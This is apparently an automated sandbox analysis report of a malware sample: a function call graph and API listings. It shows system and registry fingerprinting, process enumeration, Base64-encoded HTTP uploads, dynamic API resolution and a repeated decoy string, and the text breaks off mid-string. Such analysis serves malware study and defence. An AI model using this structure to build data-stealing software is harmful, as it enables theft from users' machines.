lstrcpy 14993->14994 14995 882250 14994->14995 14996 88a9b0 4 API calls 14995->14996 14997 882270 14996->14997 14998 88a8a0 lstrcpy 14997->14998 14999 882279 14998->14999 15574 888100 GetProcessHeap RtlAllocateHeap 14999->15574 15002 88a9b0 4 API calls 15003 
882299 15002->15003 15004 88a8a0 lstrcpy 15003->15004 15005 8822a2 15004->15005 15006 88a9b0 4 API calls 15005->15006 15007 8822c1 15006->15007 15008 88a8a0 lstrcpy 15007->15008 15009 8822ca 15008->15009 15010 88a9b0 4 API calls 15009->15010 15011 8822eb 15010->15011 15012 88a8a0 lstrcpy 15011->15012 15013 8822f4 15012->15013 15580 8887c0 15013->15580 15016 88a920 3 API calls 15017 88231e 15016->15017 15018 88a8a0 lstrcpy 15017->15018 15019 882327 15018->15019 15020 88a9b0 4 API calls 15019->15020 15021 882351 15020->15021 15022 88a8a0 lstrcpy 15021->15022 15023 88235a 15022->15023 15024 88a9b0 4 API calls 15023->15024 15025 88237a 15024->15025 15026 88a8a0 lstrcpy 15025->15026 15027 882383 15026->15027 15028 88a9b0 4 API calls 15027->15028 15029 8823a2 15028->15029 15030 88a8a0 lstrcpy 15029->15030 15031 8823ab 15030->15031 15585 8881f0 15031->15585 15033 8823c2 15034 88a920 3 API calls 15033->15034 15035 8823d5 15034->15035 15036 88a8a0 lstrcpy 15035->15036 15037 8823de 15036->15037 15038 88a9b0 4 API calls 15037->15038 15039 88240a 15038->15039 15040 88a8a0 lstrcpy 15039->15040 15041 882413 15040->15041 15042 88a9b0 4 API calls 15041->15042 15043 882432 15042->15043 15044 88a8a0 lstrcpy 15043->15044 15045 88243b 15044->15045 15046 88a9b0 4 API calls 15045->15046 15047 88245c 15046->15047 15048 88a8a0 lstrcpy 15047->15048 15049 882465 15048->15049 15050 88a9b0 4 API calls 15049->15050 15051 882484 15050->15051 15052 88a8a0 lstrcpy 15051->15052 15053 88248d 15052->15053 15054 88a9b0 4 API calls 15053->15054 15055 8824ae 15054->15055 15056 88a8a0 lstrcpy 15055->15056 15057 8824b7 15056->15057 15593 888320 15057->15593 15059 8824d3 15060 88a920 3 API calls 15059->15060 15061 8824e6 15060->15061 15062 88a8a0 lstrcpy 15061->15062 15063 8824ef 15062->15063 15064 88a9b0 4 API calls 15063->15064 15065 882519 15064->15065 15066 88a8a0 lstrcpy 15065->15066 15067 882522 15066->15067 15068 88a9b0 4 API calls 15067->15068 15069 882543 15068->15069 15070 88a8a0 lstrcpy 
15069->15070 15071 88254c 15070->15071 15072 888320 17 API calls 15071->15072 15073 882568 15072->15073 15074 88a920 3 API calls 15073->15074 15075 88257b 15074->15075 15076 88a8a0 lstrcpy 15075->15076 15077 882584 15076->15077 15078 88a9b0 4 API calls 15077->15078 15079 8825ae 15078->15079 15080 88a8a0 lstrcpy 15079->15080 15081 8825b7 15080->15081 15082 88a9b0 4 API calls 15081->15082 15083 8825d6 15082->15083 15084 88a8a0 lstrcpy 15083->15084 15085 8825df 15084->15085 15086 88a9b0 4 API calls 15085->15086 15087 882600 15086->15087 15088 88a8a0 lstrcpy 15087->15088 15089 882609 15088->15089 15629 888680 15089->15629 15091 882620 15092 88a920 3 API calls 15091->15092 15093 882633 15092->15093 15094 88a8a0 lstrcpy 15093->15094 15095 88263c 15094->15095 15096 88265a lstrlen 15095->15096 15097 88266a 15096->15097 15098 88a740 lstrcpy 15097->15098 15099 88267c 15098->15099 15100 871590 lstrcpy 15099->15100 15101 88268d 15100->15101 15639 885190 15101->15639 15103 882699 15103->13535 15105 88aad0 15104->15105 15106 875009 InternetOpenUrlA 15105->15106 15107 875021 15106->15107 15108 8750a0 InternetCloseHandle InternetCloseHandle 15107->15108 15109 87502a InternetReadFile 15107->15109 15110 8750ec 15108->15110 15109->15107 15110->13539 15824 8798d0 15111->15824 15113 880759 15114 880a38 15113->15114 15115 88077d 15113->15115 15116 871590 lstrcpy 15114->15116 15118 880799 StrCmpCA 15115->15118 15117 880a49 15116->15117 16000 880250 15117->16000 15120 8807a8 15118->15120 15121 880843 15118->15121 15123 88a7a0 lstrcpy 15120->15123 15124 880865 StrCmpCA 15121->15124 15125 8807c3 15123->15125 15126 880874 15124->15126 15163 88096b 15124->15163 15127 871590 lstrcpy 15125->15127 15129 88a740 lstrcpy 15126->15129 15128 88080c 15127->15128 15130 88a7a0 lstrcpy 15128->15130 15132 880881 15129->15132 15133 880823 15130->15133 15131 88099c StrCmpCA 15134 8809ab 15131->15134 15135 880a2d 15131->15135 15136 88a9b0 4 API calls 15132->15136 15137 88a7a0 lstrcpy 15133->15137 15138 
871590 lstrcpy 15134->15138 15135->13543 15139 8808ac 15136->15139 15140 88083e 15137->15140 15141 8809f4 15138->15141 15142 88a920 3 API calls 15139->15142 15827 87fb00 15140->15827 15145 88a7a0 lstrcpy 15141->15145 15143 8808b3 15142->15143 15146 88a9b0 4 API calls 15143->15146 15147 880a0d 15145->15147 15149 8808ba 15146->15149 15148 88a7a0 lstrcpy 15147->15148 15150 880a28 15148->15150 15163->15131 15483 88a7a0 lstrcpy 15482->15483 15484 871683 15483->15484 15485 88a7a0 lstrcpy 15484->15485 15486 871695 15485->15486 15487 88a7a0 lstrcpy 15486->15487 15488 8716a7 15487->15488 15489 88a7a0 lstrcpy 15488->15489 15490 8715a3 15489->15490 15490->14366 15492 8747c6 15491->15492 15493 874838 lstrlen 15492->15493 15494 88aad0 15493->15494 15495 874848 InternetCrackUrlA 15494->15495 15496 874867 15495->15496 15496->14443 15498 88a740 lstrcpy 15497->15498 15499 888b74 15498->15499 15500 88a740 lstrcpy 15499->15500 15501 888b82 GetSystemTime 15500->15501 15502 888b99 15501->15502 15503 88a7a0 lstrcpy 15502->15503 15504 888bfc 15503->15504 15504->14458 15506 88a931 15505->15506 15507 88a988 15506->15507 15509 88a968 lstrcpy lstrcat 15506->15509 15508 88a7a0 lstrcpy 15507->15508 15510 88a994 15508->15510 15509->15507 15510->14461 15512 874e13 HttpSendRequestA 15511->15512 15512->14577 15514 874eee 15513->15514 15515 879af9 LocalAlloc 15513->15515 15514->14464 15514->14466 15515->15514 15516 879b14 CryptStringToBinaryA 15515->15516 15516->15514 15517 879b39 LocalFree 15516->15517 15517->15514 15646 8877a0 15518->15646 15521 881c1e 15521->14819 15522 8876c6 RegOpenKeyExA 15523 887704 RegCloseKey 15522->15523 15524 8876e7 RegQueryValueExA 15522->15524 15523->15521 15524->15523 15526 881c99 15525->15526 15526->14833 15528 881e09 15527->15528 15528->14875 15530 887a9a wsprintfA 15529->15530 15531 881e84 15529->15531 15530->15531 15531->14889 15533 887b4d 15532->15533 15535 881efe 15532->15535 15653 888d20 LocalAlloc CharToOemW 15533->15653 15535->14903 15537 88a740 lstrcpy 
15536->15537 15538 887bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15537->15538 15547 887c25 15538->15547 15539 887d18 15541 887d28 15539->15541 15542 887d1e LocalFree 15539->15542 15540 887c46 GetLocaleInfoA 15540->15547 15544 88a7a0 lstrcpy 15541->15544 15542->15541 15543 88a9b0 lstrcpy lstrlen lstrcpy lstrcat 15543->15547 15545 887d37 15544->15545 15545->14916 15546 88a8a0 lstrcpy 15546->15547 15547->15539 15547->15540 15547->15543 15547->15546 15549 882008 15548->15549 15549->14931 15551 889493 GetModuleFileNameExA CloseHandle 15550->15551 15552 8894b5 15550->15552 15551->15552 15553 88a740 lstrcpy 15552->15553 15554 882091 15553->15554 15554->14946 15556 887e68 RegQueryValueExA 15555->15556 15557 882119 15555->15557 15558 887e8e RegCloseKey 15556->15558 15557->14960 15558->15557 15560 887fb9 GetLogicalProcessorInformationEx 15559->15560 15561 887fd8 GetLastError 15560->15561 15565 888029 15560->15565 15562 888022 15561->15562 15571 887fe3 15561->15571 15564 882194 15562->15564 15567 8889f0 2 API calls 15562->15567 15564->14974 15568 8889f0 2 API calls 15565->15568 15567->15564 15569 88807b 15568->15569 15569->15562 15570 888084 wsprintfA 15569->15570 15570->15564 15571->15560 15571->15564 15654 8889f0 15571->15654 15657 888a10 GetProcessHeap RtlAllocateHeap 15571->15657 15573 88220f 15572->15573 15573->14988 15575 8889b0 15574->15575 15576 88814d GlobalMemoryStatusEx 15575->15576 15577 888163 15576->15577 15578 88819b wsprintfA 15577->15578 15579 882289 15578->15579 15579->15002 15581 8887fb GetProcessHeap RtlAllocateHeap wsprintfA 15580->15581 15583 88a740 lstrcpy 15581->15583 15584 88230b 15583->15584 15584->15016 15586 88a740 lstrcpy 15585->15586 15592 888229 15586->15592 15587 888263 15589 88a7a0 lstrcpy 15587->15589 15588 88a9b0 lstrcpy lstrlen lstrcpy lstrcat 15588->15592 15590 8882dc 15589->15590 15590->15033 15591 88a8a0 lstrcpy 15591->15592 15592->15587 15592->15588 15592->15591 15594 88a740 lstrcpy 15593->15594 15595 88835c 
RegOpenKeyExA 15594->15595 15596 8883ae 15595->15596 15597 8883d0 15595->15597 15598 88a7a0 lstrcpy 15596->15598 15599 8883f8 RegEnumKeyExA 15597->15599 15600 888613 RegCloseKey 15597->15600 15610 8883bd 15598->15610 15601 88860e 15599->15601 15602 88843f wsprintfA RegOpenKeyExA 15599->15602 15603 88a7a0 lstrcpy 15600->15603 15601->15600 15604 8884c1 RegQueryValueExA 15602->15604 15605 888485 RegCloseKey RegCloseKey 15602->15605 15603->15610 15606 8884fa lstrlen 15604->15606 15607 888601 RegCloseKey 15604->15607 15608 88a7a0 lstrcpy 15605->15608 15606->15607 15609 888510 15606->15609 15607->15601 15608->15610 15611 88a9b0 4 API calls 15609->15611 15610->15059 15612 888527 15611->15612 15613 88a8a0 lstrcpy 15612->15613 15614 888533 15613->15614 15615 88a9b0 4 API calls 15614->15615 15616 888557 15615->15616 15617 88a8a0 lstrcpy 15616->15617 15618 888563 15617->15618 15619 88856e RegQueryValueExA 15618->15619 15619->15607 15620 8885a3 15619->15620 15621 88a9b0 4 API calls 15620->15621 15622 8885ba 15621->15622 15623 88a8a0 lstrcpy 15622->15623 15624 8885c6 15623->15624 15625 88a9b0 4 API calls 15624->15625 15626 8885ea 15625->15626 15627 88a8a0 lstrcpy 15626->15627 15628 8885f6 15627->15628 15628->15607 15630 88a740 lstrcpy 15629->15630 15631 8886bc CreateToolhelp32Snapshot Process32First 15630->15631 15632 8886e8 Process32Next 15631->15632 15633 88875d CloseHandle 15631->15633 15632->15633 15638 8886fd 15632->15638 15634 88a7a0 lstrcpy 15633->15634 15635 888776 15634->15635 15635->15091 15636 88a9b0 lstrcpy lstrlen lstrcpy lstrcat 15636->15638 15637 88a8a0 lstrcpy 15637->15638 15638->15632 15638->15636 15638->15637 15640 88a7a0 lstrcpy 15639->15640 15641 8851b5 15640->15641 15642 871590 lstrcpy 15641->15642 15643 8851c6 15642->15643 15658 875100 15643->15658 15645 8851cf 15645->15103 15649 887720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15646->15649 15648 8876b9 15648->15521 15648->15522 15650 887780 RegCloseKey 15649->15650 15651 887765 RegQueryValueExA 
15649->15651 15652 887793 15650->15652 15651->15650 15652->15648 15653->15535 15655 8889f9 GetProcessHeap HeapFree 15654->15655 15656 888a0c 15654->15656 15655->15656 15656->15571 15657->15571 15659 88a7a0 lstrcpy 15658->15659 15660 875119 15659->15660 15661 8747b0 2 API calls 15660->15661 15662 875125 15661->15662 15818 888ea0 15662->15818 15664 875184 15665 875192 lstrlen 15664->15665 15666 8751a5 15665->15666 15667 888ea0 4 API calls 15666->15667 15668 8751b6 15667->15668 15669 88a740 lstrcpy 15668->15669 15670 8751c9 15669->15670 15671 88a740 lstrcpy 15670->15671 15672 8751d6 15671->15672 15673 88a740 lstrcpy 15672->15673 15674 8751e3 15673->15674 15675 88a740 lstrcpy 15674->15675 15676 8751f0 15675->15676 15677 88a740 lstrcpy 15676->15677 15678 8751fd InternetOpenA StrCmpCA 15677->15678 15679 87522f 15678->15679 15680 8758c4 InternetCloseHandle 15679->15680 15681 888b60 3 API calls 15679->15681 15687 8758d9 ctype 15680->15687 15682 87524e 15681->15682 15683 88a920 3 API calls 15682->15683 15684 875261 15683->15684 15685 88a8a0 lstrcpy 15684->15685 15686 87526a 15685->15686 15688 88a9b0 4 API calls 15686->15688 15691 88a7a0 lstrcpy 15687->15691 15689 8752ab 15688->15689 15690 88a920 3 API calls 15689->15690 15692 8752b2 15690->15692 15696 875913 15691->15696 15693 88a9b0 4 API calls 15692->15693 15694 8752b9 15693->15694 15695 88a8a0 lstrcpy 15694->15695 15697 8752c2 15695->15697 15696->15645 15698 88a9b0 4 API calls 15697->15698 15699 875303 15698->15699 15700 88a920 3 API calls 15699->15700 15701 87530a 15700->15701 15702 88a8a0 lstrcpy 15701->15702 15703 875313 15702->15703 15704 875329 InternetConnectA 15703->15704 15704->15680 15705 875359 HttpOpenRequestA 15704->15705 15707 8758b7 InternetCloseHandle 15705->15707 15708 8753b7 15705->15708 15707->15680 15709 88a9b0 4 API calls 15708->15709 15710 8753cb 15709->15710 15711 88a8a0 lstrcpy 15710->15711 15712 8753d4 15711->15712 15713 88a920 3 API calls 15712->15713 15714 8753f2 15713->15714 15715 88a8a0 
lstrcpy 15714->15715 15716 8753fb 15715->15716 15717 88a9b0 4 API calls 15716->15717 15718 87541a 15717->15718 15719 88a8a0 lstrcpy 15718->15719 15720 875423 15719->15720 15721 88a9b0 4 API calls 15720->15721 15722 875444 15721->15722 15723 88a8a0 lstrcpy 15722->15723 15724 87544d 15723->15724 15725 88a9b0 4 API calls 15724->15725 15726 87546e 15725->15726 15819 888ea9 15818->15819 15820 888ead CryptBinaryToStringA 15818->15820 15819->15664 15820->15819 15821 888ece GetProcessHeap RtlAllocateHeap 15820->15821 15821->15819 15822 888ef4 ctype 15821->15822 15823 888f05 CryptBinaryToStringA 15822->15823 15823->15819 16066 879880 15824->16066 15826 8798e1 15826->15113 15828 88a740 lstrcpy 15827->15828 15829 87fb16 15828->15829 16001 88a740 lstrcpy 16000->16001 16002 880266 16001->16002 16003 888de0 2 API calls 16002->16003 16004 88027b 16003->16004 16005 88a920 3 API calls 16004->16005 16006 88028b 16005->16006 16007 88a8a0 lstrcpy 16006->16007 16008 880294 16007->16008 16009 88a9b0 4 API calls 16008->16009 16010 8802b8 16009->16010 16067 87988e 16066->16067 16070 876fb0 16067->16070 16069 8798ad ctype 16069->15826 16073 876d40 16070->16073 16074 876d63 16073->16074 16088 876d59 16073->16088 16089 876530 16074->16089 16078 876dbe 16078->16088 16099 8769b0 16078->16099 16080 876e2a 16081 876ee6 VirtualFree 16080->16081 16083 876ef7 16080->16083 16080->16088 16081->16083 16082 876f41 16086 8889f0 2 API calls 16082->16086 16082->16088 16083->16082 16084 876f26 FreeLibrary 16083->16084 16085 876f38 16083->16085 16084->16083 16087 8889f0 2 API calls 16085->16087 16086->16088 16087->16082 16088->16069 16090 876542 16089->16090 16092 876549 16090->16092 16109 888a10 GetProcessHeap RtlAllocateHeap 16090->16109 16092->16088 16093 876660 16092->16093 16096 87668f VirtualAlloc 16093->16096 16095 876730 16097 876743 VirtualAlloc 16095->16097 16098 87673c 16095->16098 16096->16095 16096->16098 16097->16098 16098->16078 16100 8769c9 16099->16100 16105 8769d5 16099->16105 16101 876a09 
LoadLibraryA 16100->16101 16100->16105 16102 876a32 16101->16102 16101->16105 16103 876ae0 16102->16103 16110 888a10 GetProcessHeap RtlAllocateHeap 16102->16110 16103->16105 16106 876ba8 GetProcAddress 16103->16106 16105->16080 16106->16103 16106->16105 16107 8889f0 2 API calls 16107->16103 16108 876a8b 16108->16105 16108->16107 16109->16092 16110->16108

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 889860-889874 call 889750 663 88987a-889a8e call 889780 GetProcAddress * 21 660->663 664 889a93-889af2 LoadLibraryA * 5 660->664 663->664 666 889b0d-889b14 664->666 667 889af4-889b08 GetProcAddress 664->667 668 889b46-889b4d 666->668 669 889b16-889b41 GetProcAddress * 2 666->669 667->666 671 889b68-889b6f 668->671 672 889b4f-889b63 GetProcAddress 668->672 669->668 673 889b89-889b90 671->673 674 889b71-889b84 GetProcAddress 671->674 672->671 675 889bc1-889bc2 673->675 676 889b92-889bbc GetProcAddress * 2 673->676 674->673 676->675
                  APIs
                  • GetProcAddress.KERNEL32(75900000,015D0738), ref: 008898A1
                  • GetProcAddress.KERNEL32(75900000,015D0840), ref: 008898BA
                  • GetProcAddress.KERNEL32(75900000,015D05D0), ref: 008898D2
                  • GetProcAddress.KERNEL32(75900000,015D05E8), ref: 008898EA
                  • GetProcAddress.KERNEL32(75900000,015D0618), ref: 00889903
                  • GetProcAddress.KERNEL32(75900000,015D8940), ref: 0088991B
                  • GetProcAddress.KERNEL32(75900000,015C6920), ref: 00889933
                  • GetProcAddress.KERNEL32(75900000,015C69A0), ref: 0088994C
                  • GetProcAddress.KERNEL32(75900000,015D0660), ref: 00889964
                  • GetProcAddress.KERNEL32(75900000,015D06A8), ref: 0088997C
                  • GetProcAddress.KERNEL32(75900000,015D0558), ref: 00889995
                  • GetProcAddress.KERNEL32(75900000,015D06C0), ref: 008899AD
                  • GetProcAddress.KERNEL32(75900000,015C6700), ref: 008899C5
                  • GetProcAddress.KERNEL32(75900000,015D0708), ref: 008899DE
                  • GetProcAddress.KERNEL32(75900000,015D0750), ref: 008899F6
                  • GetProcAddress.KERNEL32(75900000,015C6680), ref: 00889A0E
                  • GetProcAddress.KERNEL32(75900000,015D0768), ref: 00889A27
                  • GetProcAddress.KERNEL32(75900000,015D0870), ref: 00889A3F
                  • GetProcAddress.KERNEL32(75900000,015C69C0), ref: 00889A57
                  • GetProcAddress.KERNEL32(75900000,015D0918), ref: 00889A70
                  • GetProcAddress.KERNEL32(75900000,015C6880), ref: 00889A88
                  • LoadLibraryA.KERNEL32(015D0858,?,00886A00), ref: 00889A9A
                  • LoadLibraryA.KERNEL32(015D08D0,?,00886A00), ref: 00889AAB
                  • LoadLibraryA.KERNEL32(015D08B8,?,00886A00), ref: 00889ABD
                  • LoadLibraryA.KERNEL32(015D0888,?,00886A00), ref: 00889ACF
                  • LoadLibraryA.KERNEL32(015D08A0,?,00886A00), ref: 00889AE0
                  • GetProcAddress.KERNEL32(75070000,015D08E8), ref: 00889B02
                  • GetProcAddress.KERNEL32(75FD0000,015D0900), ref: 00889B23
                  • GetProcAddress.KERNEL32(75FD0000,015D8CE8), ref: 00889B3B
                  • GetProcAddress.KERNEL32(75A50000,015D8C10), ref: 00889B5D
                  • GetProcAddress.KERNEL32(74E50000,015C69E0), ref: 00889B7E
                  • GetProcAddress.KERNEL32(76E80000,015D8980), ref: 00889B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00889BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00889BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 2ea74473eb56e6488753559d7e06573393f136e19887540fbcd641cd4dc16419
                  • Instruction ID: 5e5194eda6b0b585ff6b3cdbfecafb068813c244780c30b005f66c1f0fc4971f
                  • Opcode Fuzzy Hash: 2ea74473eb56e6488753559d7e06573393f136e19887540fbcd641cd4dc16419
                  • Instruction Fuzzy Hash: 93A14EB6604240AFD354EFE8FD8896637F9F76C301B54471AE605C3676DA3A9483CB12

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 8745c0-874695 RtlAllocateHeap 781 8746a0-8746a6 764->781 782 87474f-8747a9 VirtualProtect 781->782 783 8746ac-87474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0087460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0087479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008746D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0087473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00874662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008745E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by 